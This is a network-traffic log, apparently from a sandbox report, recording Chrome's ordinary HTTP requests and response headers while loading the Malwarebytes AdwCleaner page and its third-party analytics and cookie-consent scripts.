                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"941f7751727dd71:0"
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:19:57 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: lVH7UplOI4r5itUoWoTfXlrRNQ0BRpJBZf8AkeEWz3okifc01Exm-g==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-light.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-light.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"d150747a727dd71:0"
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:21:06 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: GR2-82ehFj_XmjKP85-NeoIdK03sWQwItg4RgNXPovGQMRFQ29Vq-w==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts/graphik-lightitalic.otf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts/graphik-lightitalic.otf HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      cache-control: private
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: CVKexTTCkENsJxOrPOk0UsmluHOJphcNEv6IRtZG5d65ylJ1d0r37g==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/intl-sites.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/intl-sites.json HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      x-requested-with: XMLHttpRequest
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:21:53 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      etag: W/"5cc7ae96727dd71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: zVmpVbvxyZTkUq0G4ygWI1sx1Zn701B9qR1AZe27LJ8YGxTkl2nDtg==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/malwarebytes-proxy?endpoint=https%3A%2F%2Fwww-api.malwarebytes.com%2Fjs%2Fjson%2Freviews%2FYOTPO_REVIEW_DATA.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /malwarebytes-proxy?endpoint=https%3A%2F%2Fwww-api.malwarebytes.com%2Fjs%2Fjson%2Freviews%2FYOTPO_REVIEW_DATA.json HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      x-requested-with: XMLHttpRequest
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_ds=3%241673272142%3A4.53417754%3A%3A
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: font/otf
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      etag: W/"c7a84272727dd71:0"
                                                                                                                                                                      last-modified: Tue, 20 Jul 2021 14:20:52 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: OmezvKe_SOcV8WB662k-YVLHPa0wdmq5oGTLTS9wn0IGP2EW2shMow==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon.ico
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/favicon.ico HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      cookie: _vwo_ds=3%3Aa_0%2Ct_0%3A0%241673272142%3A4.53417754%3A%3A1_0%3A4_0%2C3_0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/x-icon
                                                                                                                                                                      content-length: 1150
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      date: Tue, 06 Dec 2022 10:58:55 GMT
                                                                                                                                                                      etag: "e22bd6fd6261d71:0"
                                                                                                                                                                      last-modified: Mon, 14 Jun 2021 21:19:42 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: _K-ZX2qCR2HB7BTTddzd3ycEine73LelgbKQ_IUMn8NGGMuYkRwP3w==
                                                                                                                                                                      age: 2944209
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon-32x32.png
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images/favicon-32x32.png HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _vis_opt_s=1%7C
                                                                                                                                                                      cookie: _vis_opt_test_cookie=1
                                                                                                                                                                      cookie: _vwo_uuid=J20ADA6B0BFC44F4BA8F8E156360EC539
                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      cookie: _vwo_ds=3%3Aa_0%2Ct_0%3A0%241673272142%3A4.53417754%3A%3A1_0%3A4_0%2C3_0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/png
                                                                                                                                                                      content-length: 1853
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      etag: "405d1c3a6361d71:0"
                                                                                                                                                                      last-modified: Mon, 14 Jun 2021 21:21:23 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: jDVes8i0dxmNlJhRb8tw1yo69yTASBNtlr7jm_AxyY5_dl1tqKkowA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dev.visualwebsiteoptimizer.com/lib/622914.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.96.102.137:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /lib/622914.js HTTP/2.0
                                                                                                                                                                      host: dev.visualwebsiteoptimizer.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.demandbase.com/api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.122:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b HTTP/1.1
                                                                                                                                                                      Host: api.demandbase.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Origin: https://www.malwarebytes.com
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 401 Unauthorized
                                                                                                                                                                      Content-Type: text/plain;charset=utf-8
                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.malwarebytes.com
                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                      Access-Control-Expose-Headers:
                                                                                                                                                                      Access-Control-Max-Age: 7200
                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                      WWW-Authenticate: DemandBase API v2
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Request-ID: fe0c1f12-bddc-433f-b054-4a66510eb8ce
                                                                                                                                                                      Vary: Origin
                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                      Via: 1.1 043fc2faaa02eeb59193e3fa300adb6a.cloudfront.net (CloudFront)
                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-C1
                                                                                                                                                                      X-Amz-Cf-Id: 6yW6VHM_BH6YFSbF1M8rRVWiJc35HquspSl16gN7zKgF0ccp6Vihdw==
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                      permissions-policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=(), interest-cohort=()
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/otSDKStub.js HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 8053
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: WdCEPqU1pnnoNr/cT9hHyQ==
                                                                                                                                                                      last-modified: Fri, 06 Jan 2023 16:07:56 GMT
                                                                                                                                                                      etag: 0x8DAF0002C908A6C
                                                                                                                                                                      x-ms-request-id: 98f26f26-d01e-013d-372c-222b95000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 46806
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a72df041e71-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/otBannerSdk.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/otBannerSdk.js HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 89624
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: jz950M8ZW7RakPP2zlLHZQ==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:17 GMT
                                                                                                                                                                      etag: 0x8DA6AE29E465D1D
                                                                                                                                                                      x-ms-request-id: 7e08b95c-701e-0174-68d7-9c18f5000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 18249
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a75b9121e71-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/logos/static/powered_by_logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /logos/static/powered_by_logo.svg HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                      content-md5: Y+c301RBZNK39PvKQWrIBw==
                                                                                                                                                                      last-modified: Fri, 06 Jan 2023 16:07:59 GMT
                                                                                                                                                                      x-ms-request-id: f5a88de3-e01e-011c-4c43-2246a4000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 18287
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a78cb4d1e71-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.202:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto HTTP/2.0
                                                                                                                                                                      host: content-autofill.googleapis.com
                                                                                                                                                                      x-goog-encode-response-if-executable: base64
                                                                                                                                                                      x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/82971089-2677-4e1e-8fab-44444f76330b.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /consent/82971089-2677-4e1e-8fab-44444f76330b/82971089-2677-4e1e-8fab-44444f76330b.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
